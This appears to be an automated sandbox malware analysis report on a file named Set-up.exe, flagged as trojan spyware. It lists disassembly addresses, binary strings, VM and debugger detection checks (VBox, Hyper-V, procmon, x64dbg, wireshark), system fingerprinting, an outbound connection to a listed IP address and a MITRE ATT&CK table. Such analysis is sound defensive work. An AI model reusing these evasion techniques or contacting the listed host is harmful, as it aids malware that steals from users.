Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_001F11900_2_001F1190
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_001FD1D00_2_001FD1D0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_001AD2300_2_001AD230
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_000BB2D00_2_000BB2D0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_001A73100_2_001A7310
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0039B3800_2_0039B380
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0020B3F00_2_0020B3F0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_002C33F00_2_002C33F0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0038D4300_2_0038D430
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0038F4300_2_0038F430
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_001434500_2_00143450
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_003974A00_2_003974A0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_001FB4B00_2_001FB4B0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_003935B00_2_003935B0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0020F5B00_2_0020F5B0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0008F5B00_2_0008F5B0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0002D5C00_2_0002D5C0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_003855E00_2_003855E0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_003735C00_2_003735C0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_003896500_2_00389650
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_000B56700_2_000B5670
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_003596B00_2_003596B0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_002C36A00_2_002C36A0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0039B6F00_2_0039B6F0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_000936D00_2_000936D0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_003756D00_2_003756D0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_003977300_2_00397730
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0036B7200_2_0036B720
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0009D7400_2_0009D740
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_001A97900_2_001A9790
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_003B17A00_2_003B17A0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_003957800_2_00395780
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_003837E00_2_003837E0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_000C77E00_2_000C77E0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_002197D00_2_002197D0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_001158300_2_00115830
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_001AF8500_2_001AF850
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_000CB8400_2_000CB840
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_000D98800_2_000D9880
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0038D8900_2_0038D890
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0039D8E00_2_0039D8E0
Source: C:\Users\user\Desktop\Set-up.exeCode function: String function: 001FC9B0 appears 81 times
Source: C:\Users\user\Desktop\Set-up.exeCode function: String function: 000275A0 appears 528 times
Source: C:\Users\user\Desktop\Set-up.exeCode function: String function: 001FCBC0 appears 437 times
Source: C:\Users\user\Desktop\Set-up.exeCode function: String function: 001FA170 appears 46 times
Source: C:\Users\user\Desktop\Set-up.exeCode function: String function: 001D7310 appears 43 times
Source: C:\Users\user\Desktop\Set-up.exeCode function: String function: 001044A0 appears 77 times
Source: C:\Users\user\Desktop\Set-up.exeCode function: String function: 000650A0 appears 49 times
Source: C:\Users\user\Desktop\Set-up.exeCode function: String function: 003A8B80 appears 33 times
Source: C:\Users\user\Desktop\Set-up.exeCode function: String function: 00065340 appears 48 times
Source: C:\Users\user\Desktop\Set-up.exeCode function: String function: 00139720 appears 31 times
Source: C:\Users\user\Desktop\Set-up.exeCode function: String function: 0003CD40 appears 60 times
Source: C:\Users\user\Desktop\Set-up.exeCode function: String function: 0003CCD0 appears 47 times
Source: C:\Users\user\Desktop\Set-up.exeCode function: String function: 001D7120 appears 48 times
Source: C:\Users\user\Desktop\Set-up.exeCode function: String function: 000273F0 appears 93 times
Source: C:\Users\user\Desktop\Set-up.exeCode function: String function: 000271E0 appears 41 times
Source: C:\Users\user\Desktop\Set-up.exeCode function: String function: 0002CAA0 appears 62 times
Source: C:\Users\user\Desktop\Set-up.exeCode function: String function: 00064F40 appears 294 times
Source: C:\Users\user\Desktop\Set-up.exeCode function: String function: 001D7220 appears 726 times
Source: C:\Users\user\Desktop\Set-up.exeCode function: String function: 00064FD0 appears 221 times
Source: C:\Users\user\Desktop\Set-up.exeCode function: String function: 001FCA40 appears 82 times
Source: Set-up.exeStatic PE information: invalid certificate
Source: Set-up.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: Set-up.exeBinary string: Lntdll.dllNtCreateFileNtDeviceIoControlFileNtCancelIoFileEx\Device\Afd
Source: classification engineClassification label: mal76.troj.spyw.evad.winEXE@1/0@8/2
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0003D090 GetLastError,_errno,__sys_nerr,__sys_errlist,FormatMessageW,wcstombs,strchr,strlen,strcpy,strrchr,strrchr,_errno,GetLastError,SetLastError,_errno,_errno,GetLastError,0_2_0003D090
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0002255D GetSystemInfo,GetSystemInfo,GlobalMemoryStatusEx,GlobalMemoryStatusEx,GetLogicalDriveStringsA,GetLogicalDriveStringsA,GetDriveTypeA,GetDriveTypeA,GetDiskFreeSpaceExA,GetDiskFreeSpaceExA,strlen,EnumDisplayMonitors,GetSystemMetrics,KiUserCallbackDispatcher,GetSystemMetrics,SHGetKnownFolderPath,wcscpy,wcscat,FindFirstFileW,FindFirstFileW,FindNextFileW,FindNextFileW,K32EnumProcesses,GetTickCount64,0_2_0002255D
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_000229FF FindFirstFileA,FindFirstFileA,RegOpenKeyExA,RegOpenKeyExA,GetModuleFileNameA,CharUpperA,CharUpperA,strstr,CreateToolhelp32Snapshot,Process32First,GetCurrentProcessId,Process32Next,OpenProcess,QueryFullProcessImageNameA,QueryFullProcessImageNameA,CharUpperA,CloseHandle,CloseHandle,strstr,CreateToolhelp32Snapshot,Process32First,strncpy,_strlwr_s,strstr,strstr,strstr,strstr,CloseHandle,Process32Next,CloseHandle,CloseHandle,EnumWindows,EnumWindows,GetTickCount64,0_2_000229FF
Source: C:\Users\user\Desktop\Set-up.exeMutant created: \Sessions\1\BaseNamedObjects\My_mutex
Source: Set-up.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Set-up.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Users\user\Desktop\Set-up.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\Set-up.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\Set-up.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\Set-up.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: Set-up.exeReversingLabs: Detection: 28%
Source: Set-up.exeVirustotal: Detection: 32%
Source: Set-up.exeString found in binary or memory: id-cmc-addExtensions
Source: Set-up.exeString found in binary or memory: set-addPolicy
Source: Set-up.exeString found in binary or memory: in-addr.arpa
Source: Set-up.exeString found in binary or memory: t xml:space=.gif" border="0"</body> </html> overflow:hidden;img src="http://addEventListenerresponsible for s.js"></script> /favicon.ico" />operating system" style="width:1target="_blank">State Universitytext-align:left; document.write(, including the around t
Source: Set-up.exeString found in binary or memory: Unable to complete request for channel-process-startup
Source: Set-up.exeString found in binary or memory: iphlpapi.dllif_nametoindexkernel32LoadLibraryExA\/AddDllDirectorysystem_win32.c@
Source: Set-up.exeString found in binary or memory: in-addr.arpa
Source: Set-up.exeString found in binary or memory: 8L0123456789abcdefin-addr.arpaip6.arpa
Source: Set-up.exeString found in binary or memory: Unable to complete request for channel-process-startup
Source: Set-up.exeString found in binary or memory: JM[\Unable to allocate space for channel dataFailed allocating memory for channel type nameUnable to allocate temporary space for packetWould block sending channel-open requestUnable to send channel-open requestWould blockUnexpected errorUnexpected packet sizeChannel open failure (administratively prohibited)Channel open failure (connect failed)Channel open failure (unknown channel type)Channel open failure (resource shortage)Channel open failureUnable to allocate memory for setenv packetcancel-tcpip-forwardWould block sending forward requestUnable to send global-request packet for forward listen requestauth-agent-req@openssh.comauth-agent-reqcdChannel can not be reusedUnable to allocate memory for channel-process requestWould block sending channel requestUnable to send channel requestFailed waiting for channel successUnable to complete request for channel-process-startupUnexpected packet lengthUnable to allocate memory for signal nameWould block sending window adjustUnable to send transfer-window adjustment packet, deferringtransport readwould blockWe have already closed this channelEOF has already been received, data might be ignoredFailure while draining incoming flowUnable to send channel dataUnable to send EOF, but closing channel anywayWould block sending close-channelUnable to send close-channel request, but closing anywaysessionchannel.cUnable to allocate memory for direct-tcpip connectiondirect-tcpipUnable to allocate memory for direct-streamlocal connectiondirect-streamlocal@openssh.comQR0.0.0.0tcpip-forwardWould block sending global-request packet for forward listen requestUnknownUnable to allocate memory for listener queueUnable to complete request for forward-listenWould block waiting for packetChannel not foundcdenvWould block sending setenv requestUnable to send channel-request packet for setenv requestFailed getting response for channel-setenvUnable to complete request for channel-setenvcdWould block sending auth-agent requestUnable to send auth-agent requestFailed to request auth-agentUnable to complete request for auth-agentcdterm + mode lengths too largepty-reqWould block sending pty requestUnable to send pty-request packetFailed to require the PTY packageUnable to complete request for channel request-ptywindow-changeWould block sending window-change requestUnable to send window-change packetcdUnable to allocate memory for pty-requestx11-reqMIT-MAGIC-COOKIE-1Unable to get random bytes for x11-req cookie%02XWould block sending X11-req packetUnable to send x11-req packetwaiting for x11-req response packetUnable to complete request for channel x11-reqWould block sending EOFUnable to send EOF on channelReceiving channel window has been exhausted_libssh2_transport_read() bailed out!libssh2_channel_wait_closed() invoked when channel is not in EOF stateUnable to allocate memory for signal requestsignalWould block sending signal requestUnable to send signal packetecdsa-sha2-nistp256ecdsa-sha2-nistp384ecdsa-sha2-nistp521blocksize <= siz
Source: Set-up.exeString found in binary or memory: id-cmc-addExtensions
Source: Set-up.exeString found in binary or memory: set-addPolicy
Source: Set-up.exeString found in binary or memory: overflow:hidden;img src="http://addEventListenerresponsible for s.js"></script>
Source: C:\Users\user\Desktop\Set-up.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\Set-up.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\Set-up.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\Set-up.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\Set-up.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\Set-up.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Users\user\Desktop\Set-up.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\Desktop\Set-up.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\Set-up.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\Desktop\Set-up.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\Desktop\Set-up.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\Desktop\Set-up.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\Desktop\Set-up.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\Set-up.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\Desktop\Set-up.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\Set-up.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\Set-up.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\Set-up.exeSection loaded: windowscodecs.dllJump to behavior
Source: C:\Users\user\Desktop\Set-up.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\Desktop\Set-up.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\Desktop\Set-up.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\Desktop\Set-up.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\Desktop\Set-up.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\Desktop\Set-up.exeSection loaded: kernel.appcore.dllJump to behavior
Source: Set-up.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
Source: Set-up.exeStatic file information: File size 7363720 > 1048576
Source: Set-up.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x4dd200
Source: Set-up.exeStatic PE information: Raw size of .rdata is bigger than: 0x100000 < 0x152000
Source: Set-up.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_003B8D6A LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,__acrt_iob_func,fwrite,FreeLibrary,__acrt_iob_func,fwrite,__acrt_iob_func,fwrite,FreeLibrary,__acrt_iob_func,fwrite,FreeLibrary,__acrt_iob_func,fwrite,0_2_003B8D6A
Source: Set-up.exeStatic PE information: section name: .eh_fram
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_00CF99CB pushfd ; iretd 0_3_00CF99CE
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_00CF99E9 pushfd ; iretd 0_3_00CF99EA
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_00CF99E5 pushfd ; iretd 0_3_00CF99E6
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_00CF9810 pushfd ; iretd 0_3_00CF9816
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_00CF99CB pushfd ; iretd 0_3_00CF99CE
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_00CF99E9 pushfd ; iretd 0_3_00CF99EA
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_00CF99E5 pushfd ; iretd 0_3_00CF99E6
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_00CF9810 pushfd ; iretd 0_3_00CF9816
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_00CDEF04 pushad ; ret 0_3_00CDEF09
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_00CDEF04 pushad ; ret 0_3_00CDEF09
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_00CDF420 push eax; ret 0_3_00CDF421
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_00CDF420 push eax; ret 0_3_00CDF421
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_00CE9278 push es; iretd 0_3_00CE9279
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_00CDEF04 pushad ; ret 0_3_00CDEF09
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_00CDEF04 pushad ; ret 0_3_00CDEF09
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_00CDF420 push eax; ret 0_3_00CDF421
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_00CDF420 push eax; ret 0_3_00CDF421
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_003A41D0 push eax; mov dword ptr [esp], edx0_2_003A41D5
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00240300 push eax; mov dword ptr [esp], 00000000h0_2_00240305
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_000C8640 push eax; mov dword ptr [esp], edx0_2_000C8645
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0009C6D0 push eax; mov dword ptr [esp], edx0_2_0009C6D5
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_000DC7F0 push eax; mov dword ptr [esp], 00000000h0_2_000DC743
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00060AC0 push eax; mov dword ptr [esp], 00000000h0_2_00060AC4
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00181130 push eax; mov dword ptr [esp], edx0_2_00181135
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00081430 push eax; mov dword ptr [esp], 00000000h0_2_00081433
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0012B7E0 push eax; mov dword ptr [esp], 00000000h0_2_0012B7E4

Malware Analysis System Evasion

barindex
Source: C:\Users\user\Desktop\Set-up.exeCode function: C:\Windows\System32\VBox*.dll vbox_first SYSTEM\ControlSet001\Services\VBoxSF vbox_second 0_2_000229FF
Source: Set-up.exeBinary or memory string: PROCMON.EXE
Source: Set-up.exeBinary or memory string: X64DBG.EXE
Source: Set-up.exeBinary or memory string: WINDBG.EXE
Source: Set-up.exeBinary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\*RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX*.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
Source: Set-up.exeBinary or memory string: WIRESHARK.EXE
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_000229FF FindFirstFileA,FindFirstFileA,RegOpenKeyExA,RegOpenKeyExA,GetModuleFileNameA,CharUpperA,CharUpperA,strstr,CreateToolhelp32Snapshot,Process32First,GetCurrentProcessId,Process32Next,OpenProcess,QueryFullProcessImageNameA,QueryFullProcessImageNameA,CharUpperA,CloseHandle,CloseHandle,strstr,CreateToolhelp32Snapshot,Process32First,strncpy,_strlwr_s,strstr,strstr,strstr,strstr,CloseHandle,Process32Next,CloseHandle,CloseHandle,EnumWindows,EnumWindows,GetTickCount64,0_2_000229FF
Source: C:\Users\user\Desktop\Set-up.exeAPI coverage: 6.4 %
Source: C:\Users\user\Desktop\Set-up.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0002255D GetSystemInfo,GetSystemInfo,GlobalMemoryStatusEx,GlobalMemoryStatusEx,GetLogicalDriveStringsA,GetLogicalDriveStringsA,GetDriveTypeA,GetDriveTypeA,GetDiskFreeSpaceExA,GetDiskFreeSpaceExA,strlen,EnumDisplayMonitors,GetSystemMetrics,KiUserCallbackDispatcher,GetSystemMetrics,SHGetKnownFolderPath,wcscpy,wcscat,FindFirstFileW,FindFirstFileW,FindNextFileW,FindNextFileW,K32EnumProcesses,GetTickCount64,0_2_0002255D
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_000229FF FindFirstFileA,FindFirstFileA,RegOpenKeyExA,RegOpenKeyExA,GetModuleFileNameA,CharUpperA,CharUpperA,strstr,CreateToolhelp32Snapshot,Process32First,GetCurrentProcessId,Process32Next,OpenProcess,QueryFullProcessImageNameA,QueryFullProcessImageNameA,CharUpperA,CloseHandle,CloseHandle,strstr,CreateToolhelp32Snapshot,Process32First,strncpy,_strlwr_s,strstr,strstr,strstr,strstr,CloseHandle,Process32Next,CloseHandle,CloseHandle,EnumWindows,EnumWindows,GetTickCount64,0_2_000229FF
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_001FE270 _errno,FindNextFileW,WideCharToMultiByte,strlen,_errno,calloc,MultiByteToWideChar,MultiByteToWideChar,_errno,GetLastError,MultiByteToWideChar,wcscpy,FindFirstFileW,free,_errno,0_2_001FE270
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0002255D GetSystemInfo,GetSystemInfo,GlobalMemoryStatusEx,GlobalMemoryStatusEx,GetLogicalDriveStringsA,GetLogicalDriveStringsA,GetDriveTypeA,GetDriveTypeA,GetDiskFreeSpaceExA,GetDiskFreeSpaceExA,strlen,EnumDisplayMonitors,GetSystemMetrics,KiUserCallbackDispatcher,GetSystemMetrics,SHGetKnownFolderPath,wcscpy,wcscat,FindFirstFileW,FindFirstFileW,FindNextFileW,FindNextFileW,K32EnumProcesses,GetTickCount64,0_2_0002255D
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0002255D GetSystemInfo,GetSystemInfo,GlobalMemoryStatusEx,GlobalMemoryStatusEx,GetLogicalDriveStringsA,GetLogicalDriveStringsA,GetDriveTypeA,GetDriveTypeA,GetDiskFreeSpaceExA,GetDiskFreeSpaceExA,strlen,EnumDisplayMonitors,GetSystemMetrics,KiUserCallbackDispatcher,GetSystemMetrics,SHGetKnownFolderPath,wcscpy,wcscat,FindFirstFileW,FindFirstFileW,FindNextFileW,FindNextFileW,K32EnumProcesses,GetTickCount64,0_2_0002255D
Source: Set-up.exeBinary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
Source: Set-up.exe, 00000000.00000003.1811748473.0000000000CDC000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1813418338.0000000000CDD000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1811594383.0000000000CD6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll "sv
Source: Set-up.exeBinary or memory string: Hyper-V RAW
Source: Set-up.exe, 00000000.00000003.1692580363.0000000000DB7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Y\MACHINE\SYSTEM\ControlSet001\Services\VBoxSFsion\Uninstall\{90160000-008C-0000-0000-0000000FF1CE}00000FF1CE}\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0000-0000-0000000FF1CE}
Source: Set-up.exeBinary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\*recent_filesprocessesuptime_minutesC:\Windows\System32\VBox*.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
Source: Set-up.exe, 00000000.00000003.1692006117.0000000000C83000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\Set-up.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_000229FF FindFirstFileA,FindFirstFileA,RegOpenKeyExA,RegOpenKeyExA,GetModuleFileNameA,CharUpperA,CharUpperA,strstr,CreateToolhelp32Snapshot,Process32First,GetCurrentProcessId,Process32Next,OpenProcess,QueryFullProcessImageNameA,QueryFullProcessImageNameA,CharUpperA,CloseHandle,CloseHandle,strstr,CreateToolhelp32Snapshot,Process32First,strncpy,_strlwr_s,strstr,strstr,strstr,strstr,CloseHandle,Process32Next,CloseHandle,CloseHandle,EnumWindows,EnumWindows,GetTickCount64,0_2_000229FF
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_003B8D6A LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,__acrt_iob_func,fwrite,FreeLibrary,__acrt_iob_func,fwrite,__acrt_iob_func,fwrite,FreeLibrary,__acrt_iob_func,fwrite,FreeLibrary,__acrt_iob_func,fwrite,0_2_003B8D6A
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0002116C Sleep,Sleep,SetUnhandledExceptionFilter,_set_invalid_parameter_handler,__p__acmdln,malloc,strlen,malloc,memcpy,_initterm,GetStartupInfoA,_cexit,_initterm,exit,0_2_0002116C
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00021160 Sleep,SetUnhandledExceptionFilter,_set_invalid_parameter_handler,__p__acmdln,malloc,strlen,malloc,memcpy,0_2_00021160
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_000211A3 Sleep,SetUnhandledExceptionFilter,_set_invalid_parameter_handler,__p__acmdln,malloc,strlen,malloc,memcpy,0_2_000211A3
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_000213C9 SetUnhandledExceptionFilter,_set_invalid_parameter_handler,__p__acmdln,malloc,strlen,malloc,memcpy,_initterm,0_2_000213C9
Source: C:\Users\user\Desktop\Set-up.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Set-up.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Set-up.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Set-up.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_002093D0 GetSystemTime,SystemTimeToFileTime,0_2_002093D0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_004F38F0 GetVersion,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,GetLastError,__acrt_iob_func,_time32,GetLastError,__acrt_iob_func,0_2_004F38F0
Source: C:\Users\user\Desktop\Set-up.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: Set-up.exe, Set-up.exe, 00000000.00000000.1661680610.0000000000599000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: procmon.exe
Source: Set-up.exe, Set-up.exe, 00000000.00000000.1661680610.0000000000599000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: wireshark.exe

Stealing of Sensitive Information

barindex
Source: Signature ResultsSignatures: Mutex created, HTTP post and idle behavior
Source: global trafficTCP traffic: 192.168.2.4:49731 -> 193.233.84.212:80
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0005A550 setsockopt,_errno,_errno,_errno,_errno,setsockopt,WSAGetLastError,getsockopt,setsockopt,strlen,htons,getsockopt,setsockopt,WSAGetLastError,WSAGetLastError,strchr,htons,bind,WSAGetLastError,htons,bind,WSAGetLastError,htons,strtoul,0_2_0005A550
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_000EAA30 htons,htons,socket,ioctlsocket,setsockopt,setsockopt,htonl,bind,setsockopt,setsockopt,connect,WSAGetLastError,closesocket,0_2_000EAA30
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0006E520 strlen,strchr,strchr,strchr,strtoul,strchr,strtoul,memcpy,getsockname,WSAGetLastError,WSAGetLastError,memcpy,htons,bind,WSAGetLastError,getsockname,WSAGetLastError,bind,htons,bind,WSAGetLastError,getsockname,listen,listen,WSAGetLastError,htons,0_2_0006E520
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
Command and Scripting Interpreter
1
DLL Side-Loading
1
DLL Side-Loading
1
Virtualization/Sandbox Evasion
OS Credential Dumping1
System Time Discovery
Remote Services11
Archive Collected Data
21
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts1
Native API
Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
Deobfuscate/Decode Files or Information
LSASS Memory221
Security Software Discovery
Remote Desktop Protocol1
Data from Local System
4
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)2
Obfuscated Files or Information
Security Account Manager1
Virtualization/Sandbox Evasion
SMB/Windows Admin SharesData from Network Shared Drive4
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
DLL Side-Loading
NTDS12
Process Discovery
Distributed Component Object ModelInput Capture5
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets1
Remote System Discovery
